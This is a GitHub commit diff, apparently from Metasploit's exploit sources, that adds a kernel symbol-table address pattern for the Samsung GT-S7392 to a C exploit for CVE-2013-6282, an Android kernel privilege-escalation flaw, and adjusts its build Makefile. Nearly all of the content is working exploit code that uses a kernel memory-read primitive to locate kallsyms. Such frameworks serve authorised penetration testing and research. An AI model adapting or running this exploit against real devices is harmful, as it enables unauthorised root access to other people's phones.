Skip to content

Commit 891fccb

Browse files
timwrtimwr
committed
add pattern for GT-S7392
1 parent 07ce7f3 commit 891fccb

File tree

2 files changed

+16
-7
lines changed

2 files changed

+16
-7
lines changed

external/source/exploits/CVE-2013-6282/Makefile

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
all: install
33

44
build:
5-
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
5+
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 APP_ABI=armeabi
66

77
install: build
88
mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2013-6282.so

external/source/exploits/CVE-2013-6282/exploit.c

Lines changed: 15 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,11 @@ unsigned long pattern_kallsyms_addresses3[] = {
5050
0xc00081c0, /* _stext */
5151
0xc00081c0 /* __exception_text_start */
5252
};
53+
unsigned long pattern_kallsyms_addresses4[] = {
54+
0xc0008180,
55+
0xc0008180,
56+
0xc0008180
57+
};
5358

5459
unsigned long *kallsymsmem = NULL;
5560
unsigned long kallsyms_num_syms;
@@ -134,13 +139,12 @@ unsigned long *kerneldump(unsigned long startaddr, unsigned long dumpsize) {
134139
return allocaddr;
135140
}
136141

137-
int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
142+
int check_pattern(unsigned long *addr, unsigned long firstval, unsigned long *pattern, int patternnum) {
138143
unsigned long val;
139144
unsigned long cnt;
140145
unsigned long i;
141146

142-
read_value_at_address((unsigned long)addr, &val);
143-
if (val == pattern[0]) {
147+
if (firstval == pattern[0]) {
144148
cnt = 1;
145149
for (i = 1; i < patternnum; i++) {
146150
read_value_at_address((unsigned long)(&addr[i]), &val);
@@ -159,11 +163,16 @@ int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
159163
}
160164

161165
int check_kallsyms_header(unsigned long *addr) {
162-
if (check_pattern(addr, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
166+
unsigned long val;
167+
read_value_at_address((unsigned long)addr, &val);
168+
169+
if (check_pattern(addr, val, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
170+
return 0;
171+
} else if (check_pattern(addr, val, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
163172
return 0;
164-
} else if (check_pattern(addr, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
173+
} else if (check_pattern(addr, val, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
165174
return 0;
166-
} else if (check_pattern(addr, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
175+
} else if (check_pattern(addr, val, pattern_kallsyms_addresses4, sizeof(pattern_kallsyms_addresses4) / 4) == 0) {
167176
return 0;
168177
}
169178

0 commit comments

Comments
 (0)